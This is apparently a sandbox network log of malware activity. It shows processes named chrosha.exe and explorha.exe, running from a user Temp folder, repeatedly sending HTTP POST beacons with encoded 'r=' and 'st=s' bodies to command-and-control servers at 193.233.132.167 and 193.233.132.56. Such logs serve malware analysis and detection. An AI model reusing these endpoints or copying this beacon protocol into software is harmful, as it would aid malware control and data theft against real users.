                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:44.038248062 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
817 | 192.168.2.5 | 50665 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:44.024552107 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:44.278537035 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
818 | 192.168.2.5 | 50666 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:44.401892900 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:44.646271944 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
819 | 192.168.2.5 | 50667 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:44.640439987 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:44.888995886 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
820 | 192.168.2.5 | 50668 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:44.899013042 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:45.149136066 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
821 | 192.168.2.5 | 50669 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:45.140919924 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:45.388838053 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
822 | 192.168.2.5 | 50670 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:45.505260944 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:45.749106884 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
823 | 192.168.2.5 | 50671 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:45.755362988 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:45.999897003 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
824 | 192.168.2.5 | 50672 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:45.993355989 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:46.237643003 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
825 | 192.168.2.5 | 50673 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:46.249335051 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:46.498030901 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
826 | 192.168.2.5 | 50674 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:46.599246025 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:46.841931105 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
827 | 192.168.2.5 | 50675 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:46.851942062 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:47.098614931 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
828 | 192.168.2.5 | 50676 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:47.095530033 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:47.350264072 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
829 | 192.168.2.5 | 50677 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:47.355653048 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:47.606002092 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
830 | 192.168.2.5 | 50678 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:47.713692904 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:47.957876921 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
831 | 192.168.2.5 | 50679 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:47.966485977 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:48.218213081 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
832 | 192.168.2.5 | 50680 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:48.208069086 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:48.457617998 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
833 | 192.168.2.5 | 50681 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:48.471487045 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:48.723680973 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
834 | 192.168.2.5 | 50682 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:48.823247910 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
